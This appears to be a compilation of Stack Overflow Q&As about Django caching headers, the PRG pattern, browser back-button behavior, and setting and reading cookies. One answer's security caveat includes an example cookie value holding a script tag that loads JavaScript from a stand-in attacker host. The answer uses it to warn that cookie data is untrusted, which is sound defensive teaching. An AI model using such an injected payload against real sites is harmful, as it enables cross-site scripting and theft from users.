Setting up cache with Django to work around the "page has expired" IE problem

I have a familiar problem. I am using Django 0.97 and cannot upgrade, though the version of Django being used should not play any part in the cause of the problem.
I have a search view that presents a form to the user, and, on submission of the form via POST, performs heavy computations and displays a list of items that are generated as a result of those computations. Users may click on the "more info" link of any of those items to view the item detail page.
Users on IE, once they are on the item detail page for any item from the search results page, get the familiar "webpage has expired, click on refresh button, yadda yadda yadda" error when they hit the "back" button on the browser. Sadly, a good majority of the users of the site use IE, are not tech savvy, and are complaining about this problem.
Thinking that setting up a cache backend may solve the problem, I configured a simple cache backend. I juggled with per-site cache and per-view cache, but to no avail. And now, I am not too sure I have set up the cache stuff properly.
Any hints, suggestions that may help in mitigating the problem will be hugely appreciated.
Thanks.
UPDATE (20 July 2009)
I have used Fiddler to inspect the HTTP headers of both the request and response. IE is sending the Pragma: no-cache header in the POST request. The HTTP response generated as a result of the request has the following headers:
Cache-Control: public, max-age=3600
Date: someDateHere
Vary: Cookie
And, yes, I am not using the PRG pattern.

You may find you need to use the PRG pattern (Post/Redirect/Get). With this pattern, the handler for the POST will:
Perform the heavy computations, determine the search results, and store them in the user's session (or store them in the db, keyed by the user's session).
Send a response with a redirect header to an idempotent page, which the browser then fetches with a GET when it follows the redirect.
When the redirected-to page is accessed, the server displays the search results page, computed from the stored data in the session, at a different URL from the one that was POSTed to. You should be able to use normal caching headers for this (search results) page, depending on how volatile your search results are.
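A minimal sketch of PRG in Django (written with current Django idioms rather than 0.97's); run_search is a hypothetical helper, and the form class, URLs, and template names are illustrative:
from django.http import HttpResponseRedirect
from django.shortcuts import render

from myapp.forms import SearchForm  # assumption: your existing form class

def search(request):
    if request.method == 'POST':
        form = SearchForm(request.POST)
        if form.is_valid():
            # Do the heavy computation once, on the POST.
            results = run_search(form.cleaned_data)  # hypothetical helper
            request.session['search_results'] = results
            # Redirect so the browser ends up on an idempotent GET URL.
            return HttpResponseRedirect('/search/results/')
    else:
        form = SearchForm()
    return render(request, 'search_form.html', {'form': form})

def search_results(request):
    # GET-only page: safe for the back button and for caching.
    results = request.session.get('search_results', [])
    return render(request, 'search_results.html', {'results': results})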

Under RFC 2616, POST is not an idempotent method, which means the browser will not resend the request unless the user confirms that resend. So, to prevent the prompt, you must ensure that the CLIENT caches the page.
To do so, use the Cache-Control header: http://www.fiddler2.com/redir/?id=httpperf and ensure that you are not sending back any Vary or Pragma: no-cache headers: http://blogs.msdn.com/ieinternals/archive/2009/06/17/9769915.aspx
It would be helpful for you to capture your HTTP POST's response headers (e.g. with Fiddler) and update your question with them.
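For what it's worth, if you pursue the client-caching route in Django, a sketch along these lines sets the header and strips the Vary: Cookie header that SessionMiddleware adds (whether dropping Vary is acceptable depends on your page; that part is an assumption, not a general recommendation):
from django.http import HttpResponse
from django.utils.cache import patch_cache_control

def search_results(request):
    response = HttpResponse('...search results html...')
    # Ask the browser to cache for an hour so IE serves the page from
    # cache on Back instead of showing "page has expired".
    patch_cache_control(response, public=True, max_age=3600)
    # SessionMiddleware adds "Vary: Cookie", which prevents IE from
    # reusing the cached copy; deleting it is a blunt workaround.
    if response.has_header('Vary'):
        del response['Vary']
    return response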

Related

Cache website to browser when navigating back

I have a single URL/page of my website that I want to be cached by the browser: whenever a user navigates away from that page and then presses the BACK button of the browser, I don't want that request to go to Django at all, but to serve the cached version of the page that is in the browser. Also, I can't use solutions that cache the page between the web server and Django, as every user has different permissions on what data they can see.
So I added this in my nginx config:
...
location /search {
    expires 300s;
    add_header Cache-Control "private";
...
And this works very well, 50% of the time :). How can I make it work always?
whenever a user navigates away from that page and then presses the BACK button of the browser, I don't want that request to go to Django at all, but to serve the cached version of the page that is in the browser
For some browsers, this is the default behavior - if you have set no caching directives on the server, then it will keep not only a copy of the response but the entire rendered page in memory, so that when you click the back button it can be shown instantly.
But if you want to explicitly instruct the browser to cache the response you can use a max-age directive on the Cache-Control header. Set
Cache-Control: max-age=3600
This is a more modern and reliable way than using an "Expires" header, especially for small durations. If the user's browser has the incorrect time or time zone set, "Expires" might not work at all, but "max-age" still should.
If you are serving each person a different version of the page, you can add "private" too, to prevent caching by proxies (as in your example):
Cache-Control: private, max-age=3600
Note: you can't force a browser to always use the cache. If you are noticing that sometimes it doesn't use the cache, it could be that:
The item in the cache has expired. You were giving it only 5 minutes, so 5 minutes after the request that went into the cache, a new request will be sent through to the remote server - even if there have been other requests in between.
The browser cache became full and some items were purged.
For some reason the browser believed or was configured to believe that the response should not be cached regardless of cache directives.
The user pressed reload.
A proxy between client and server stripped the Cache-Control or other headers.
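Incidentally, the same headers can be set from Django itself instead of nginx; a minimal sketch using the stock cache_control decorator (the view name is hypothetical):
from django.http import HttpResponse
from django.views.decorators.cache import cache_control

# Equivalent of the nginx config above: private, cacheable for 5 minutes.
@cache_control(private=True, max_age=300)
def search(request):
    return HttpResponse('...per-user search page...')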

Can I set a cookie in this situation?

I want to post a banner ad on a.com. For this to happen, a.com has to query b.com for the banner URL via JSONP. When requested, b.com returns something like this:
{
    "img_url": "www.c.com/banner.jpg"
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purposes.
I have no control over a.com, so I cannot write any client-side JS or ask them to include any external JS files. I can only expose a query URL on b.com for a.com's programmer to query.
I have total control of b.com and c.com
When a.com receives the banner URL via JSONP, it will insert the banner dynamically into its DOM for display purposes.
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevent c.com from setting any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com, then www.c.com could include cookie-setting headers in its response.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
How much parsing you do of the values is up to you. Also note that there are many cookie attributes you may consider setting.
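For concreteness, a sketch of the image handler on www.c.com setting and reading such a cookie, written as a Django view (the banners directory and URL scheme are assumptions):
from django.http import HttpResponse

def banner(request, banner_id):
    # Read back which banners this browser has already seen.
    seen = request.COOKIES.get('seen_banners', '')
    seen_ids = set(filter(None, seen.split(',')))

    with open('banners/%s.jpg' % banner_id, 'rb') as f:  # hypothetical storage
        response = HttpResponse(f.read(), content_type='image/jpeg')

    if banner_id not in seen_ids:
        seen_ids.add(banner_id)
        # Echo the updated list back; in real use also set expires/path/domain.
        response.set_cookie('seen_banners', ','.join(sorted(seen_ids)),
                            max_age=30 * 24 * 3600)
    return response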
Caveats
Some modern browsers and ad-blocking extensions will block these cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some firewalls. These can be restrictions on per-cookie length, on the total length of cookies per domain, or just on the number of cookies. I've encountered a firewall that allowed a certain number of bytes in Cookie: request headers and dropped all Cookie: headers beyond that size. Some older mobile devices have very small limits on cookie size.
Cookies are editable by the user and can be tampered with by a man-in-the-middle.
Consider adding an authenticator over your cookie value, such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against replay attacks unless you include a replay defense, such as a timestamp, before signing the cookie.
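A minimal sketch of an HMAC-plus-timestamp cookie authenticator using only the Python standard library; the pipe-separated format and the key handling are assumptions:
import hashlib
import hmac
import time

SECRET_KEY = b'keep-this-really-secret'  # assumption: loaded from safe storage

def sign_cookie(value):
    # Bind a timestamp into the signed payload as a cheap replay defense.
    payload = '%s|%d' % (value, int(time.time()))
    sig = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return '%s|%s' % (payload, sig)

def verify_cookie(cookie, max_age=3600):
    try:
        value, ts, sig = cookie.rsplit('|', 2)
    except ValueError:
        return None
    expected = hmac.new(SECRET_KEY, ('%s|%s' % (value, ts)).encode(),
                        hashlib.sha256).hexdigest()
    # Constant-time comparison avoids leaking the signature via timing.
    if not hmac.compare_digest(sig, expected):
        return None
    if int(ts) + max_age < int(time.time()):
        return None  # stale: treat as a possible replay
    return value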
This is really important: cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!), don't put those values in trusted storage without labeling them tainted. If you build a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that JSONP is really, really dangerous to the users of www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Set-Cookie for a login system

I've run into a few problems with setting cookies, and based on the reading I've done, this should work, so I'm probably missing something important.
The situation:
Previously I received responses from my API and used JavaScript to save them as cookies, but then I found that using the Set-Cookie response header is more secure in a lot of situations.
I have 2 cookies: "nuser" (contains a username) and "key" (contains a session key). "nuser" shouldn't be httpOnly, so that JavaScript can access it; "key" should be httpOnly to prevent rogue scripts from stealing a user's session. Also, any request from the client to my API should contain the cookies.
The log-in request
Here's my current implementation: I make a request to my login API at localhost:8080/login/login (keep in mind that the web client is hosted on localhost:80, but based on what I've read, port numbers shouldn't matter for cookies).
First, the web browser makes an OPTIONS request to confirm that all the headers are allowed. I've made sure that the server response includes Access-Control-Allow-Credentials to alert the browser that it's okay to store cookies.
Once the OPTIONS request has succeeded, the browser makes the actual POST request to the login API. The server sends back the Set-Cookie header and everything looks good at this point.
The Problems
This set-up yields 2 problems. Firstly, though the nuser cookie is not httpOnly, I don't seem to be able to access it via JavaScript. I'm able to see nuser in my browser's cookie menu, but document.cookie yields "".
Secondly, the browser seems to only include the Cookie request header in requests to the exact same API (the login API).
If I make a request to a different API that's still on my localhost server, the Cookie header isn't present.
(That request returns a 406 just because my server is currently configured to do that if the user isn't validated. I know that this should probably be a 403; the thing to focus on is that the Cookie header isn't included among the request headers.)
So, I've explained my implementation based on my current understanding of cookies, but I'm obviously missing something. Posting exactly what the request and response headers should look like for each task would be greatly appreciated. Thanks.
Okay, I still don't know exactly what was causing the problem in this specific case, but I updated my localhost:80 server to accept API requests and then make a subsequent request to localhost:8080 to get the proper information. Because the Set-Cookie header is now being set by localhost:80 (the client's origin), everything works fine. From my reading before, I thought that ports didn't matter, but apparently they do.
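For reference, credentialed cross-origin requests have to be opted into on both ends, which may explain some of the behavior above; this is a sketch of the general pattern, not a verified diagnosis of this case, and the header values and names are illustrative:
from django.http import HttpResponse

def login(request):
    response = HttpResponse('{"ok": true}', content_type='application/json')
    # Cookies on cross-origin responses are only stored if the server
    # names the exact origin (no wildcard) and allows credentials...
    response['Access-Control-Allow-Origin'] = 'http://localhost'
    response['Access-Control-Allow-Credentials'] = 'true'
    response.set_cookie('key', 'abc123', httponly=True)  # hidden from JS
    response.set_cookie('nuser', 'alice')                # readable by JS
    return response

# ...and the client must send the request with credentials enabled,
# e.g. xhr.withCredentials = true or fetch(..., {credentials: 'include'}).
Note also that document.cookie only exposes cookies whose domain and path match the page's own origin, which could account for seeing "" even when the cookie appears in the browser's cookie viewer.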

Django @login_required views still show when users are logged out by going back in history on Chrome

::Edit::
@cache_control(no_cache=True, must_revalidate=True, no_store=True) FTW!!!!!
Cache-Control: no-cache, no-store, must-revalidate did the trick. It took going to a few IRC channels and looking around, but finally I got it to work.
::EDIT::
I have a view with @login_required on it, and it's secure for the most part, but if you have looked at the view, then log out and just hit the back button in your browser, you can view the content again without being asked to log in. If you refresh the page, though, the server will redirect you.
My suspicion is that it's a cache issue, where maybe I need to tell Chrome not to store it in the history.
If you view an invoice, for example, then log out, you can view the invoice again by selecting that page in your back history.
I have tried this on Firefox with no problem: Firefox asks you to log back in, so it must be a browser issue.
You're right, this is a cache problem.
You can use the cache_control decorator to force no cache on views[1]:
from django.http import HttpResponse
from django.views.decorators.cache import cache_control

@cache_control(no_cache=True, must_revalidate=True, no_store=True)
def func(request):
    # some code
    return HttpResponse('...')
You should also write your own decorator that replaces @login_required, so that you don't need to use both on every page; a sketch follows the footnote below.
[1] Disable browser 'Back' button after logout?
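A minimal sketch of such a combined decorator, built by stacking the two stock decorators (the name login_required_nocache is made up):
from django.contrib.auth.decorators import login_required
from django.views.decorators.cache import cache_control

def login_required_nocache(view_func):
    # Apply the no-cache headers first, then the auth check, so every
    # protected view gets both without repeating the pair.
    return login_required(
        cache_control(no_cache=True, must_revalidate=True, no_store=True)(view_func)
    )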
This behavior is caused by a feature in Webkit browsers unofficially called Page Cache, also known as the back/forward cache. It controls what happens to previous pages in the current browsing session. Webkit does something special in that it "suspends" previous pages. It's as if the previous page is hidden in another tab; clicking the back button is like bringing the tab into the foreground. The page is still there just as it was. This means no network request is made and therefore your server logic is never touched.
You'll see this behavior in Safari as well as Chrome. Look at the Network Inspector panel and watch the network traffic when you click back to a page. At a glance it looks like a request was made, and Safari does little to dispel that notion. Chrome is more polite and tells you the page was loaded "(from cache)". In Chrome, look at the size column or click the request and look at the Status Code in the Headers tab. Of course the other indicator is how long the 'request' took in the Timeline (probably 0ms).
That explains the behavior...now how to get around it. The best solution may just be a reminder on the logout page to close the browser window.
You've correctly determined that there's nothing you can do on the Django side. The cache decorators won't help you. Unfortunately, there doesn't appear to be a canonical answer to preventing the Page Cache from stashing a page. It also seems to be a feature in flux, so a solution now may just be a hack that won't work in later versions of Webkit. Or Firefox may create a similar feature with a different implementation.
Serving your site over HTTPS with cache-control: no-store or cache-control: no-cache may do it but it's heavy handed for sure. One possible hack would be to set an unload/onunload event handler.
Read more about Page Cache behavior and the unload hack suggestion on these two Surfin' Safari articles.
UPDATE - @DigitalCake found that Cache-Control: no-store has some effect. In Django, this is accomplished with @cache_control(no_store=True) decorating the view. no-store works in Chrome (v17.0.963.66) - the page is not stashed in the Page Cache and the back button causes a network request. no-store does not work in Safari (v5.1.3). This shows that even across Webkit browsers the Page Cache is implemented differently. It also demonstrates the point that current workarounds are likely to be temporary hacks.
I tried this solution and it worked for me. I put both cache control and login required on the view.
Here is the example:
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.views.decorators.cache import cache_control

@cache_control(no_cache=True, must_revalidate=True, no_store=True)
@login_required(login_url='login')
def myview(request):
    # render() already returns an HttpResponse.
    return render(request, 'path_to_your_view.html')
March 2020 update: Adding to the accepted answer, the Django 3.0 docs show a never_cache decorator.
It adds a Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private header to the response.
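Usage has the same shape as the decorators above (the view name is hypothetical):
from django.http import HttpResponse
from django.views.decorators.cache import never_cache

@never_cache
def invoice(request):
    return HttpResponse('...')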

question about cookie

I'm stuck on a cookie-related question. I want to write a program that can automatically download the attachments of this forum, so I need to maintain the cookies this site sends me. When I send a GET request from my program to the login page, I get a cookie such as Set-Cookie: sso_sid=0589a967; domain=.it168.com. Now if I send the same GET request with a cookie viewer such as Cookie Monster running, my program gets the same result, but the cookie viewer shows that the site also sends me two more cookies: testcookie (http://get2know.it/myimages/2009-12-27_072438.jpg) and token (http://get2know.it/myimages/2009-12-27_072442.jpg).
My question is: where did those two cookies come from? Why do they not show up in my program?
Thanks.
Your best bet to figure out screen-scraping problems like this one is to use Fiddler. Using Fiddler, you can compare exactly what is going over the wire in your app vs. when accessing the site from a browser. I suspect you'll see some difference between the headers sent by your app and the headers sent by the browser; this will likely account for the difference you're seeing.
Next, you can do one of two things:
change your app to send exactly the headers that the browser does (and, if you do this, you should get exactly the response that a real browser gets).
using Fiddler's "request builder" feature, start removing headers one by one and re-issuing the request. At some point, you'll remove a header which makes the response not match the response you're looking for. That means that header is required. Continue for all other headers until you have a list of headers that are required by the site to yield the response you want.
Personally, I like option #2 since it requires a minimum amount of header-setting code, although it's harder initially to figure out which headers the site requires.
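If the program is written in Python, the requests library maintains cookies across redirects for you; a sketch with browser-like headers, where the URLs and header values are placeholders for whatever Fiddler shows is actually required:
import requests

session = requests.Session()  # persists cookies across requests automatically

# Mimic the browser headers captured in Fiddler (example values only).
session.headers.update({
    'User-Agent': 'Mozilla/5.0 ...',
    'Accept': 'text/html,application/xhtml+xml',
    'Referer': 'http://www.it168.com/',
})

session.get('http://www.it168.com/login')  # hypothetical login URL
# Set-Cookie headers from the response chain, including any redirects,
# are now in session.cookies and will be sent on later requests.
attachment = session.get('http://www.it168.com/attachment?id=123')  # hypothetical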
On your actual question of why you're seeing 2 cookies, only the diagnosis above will tell you for sure, but I suspect it has to do with the mechanism some sites use to detect clients who don't accept cookies. On the first request in a session, many sites will "probe" the client to see if it accepts cookies. Typically they'll do this:
If the request doesn't have a cookie on it, the site will redirect the client to a special "cookie setter" URL.
The redirect response, in addition to having a Location: header which does the redirect, will also include a Set-Cookie header to set the cookie. The redirect will typically contain the original URL as a query-string parameter.
The server-side handler for the "cookie setter" page will then look at the incoming cookie. If it's blank, this means that the user's browser is set to not accept cookies, and the site will typically redirect the user to a "sorry, you must use cookies to use this site" page.
If, however, there is a Cookie header sent to the "cookie setter" URL, then the client does in fact accept cookies, and the handler will simply redirect the client back to the original URL.
The original URL, once you move on to the next page, may add an additional cookie (e.g. for a login token).
Anyway, that's one way you could end up with two cookies. Only diagnosis with Fiddler (or a similar tool) will tell you for sure, though.
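For concreteness, a sketch of that probe flow as Django views; the URL paths and the cookie name are made up:
from django.http import HttpResponse, HttpResponseRedirect

def some_page(request):
    if 'probe' not in request.COOKIES:
        # First visit: set the probe cookie on the redirect itself.
        response = HttpResponseRedirect('/cookie-setter/?return_to=/some-page/')
        response.set_cookie('probe', '1')
        return response
    return HttpResponse('...the real page...')

def cookie_setter(request):
    # In real use, validate return_to to avoid an open redirect.
    return_to = request.GET.get('return_to', '/')
    if 'probe' in request.COOKIES:
        # The cookie was echoed back: the client accepts cookies.
        return HttpResponseRedirect(return_to)
    # Blank cookie: the browser refuses cookies.
    return HttpResponseRedirect('/cookies-required/')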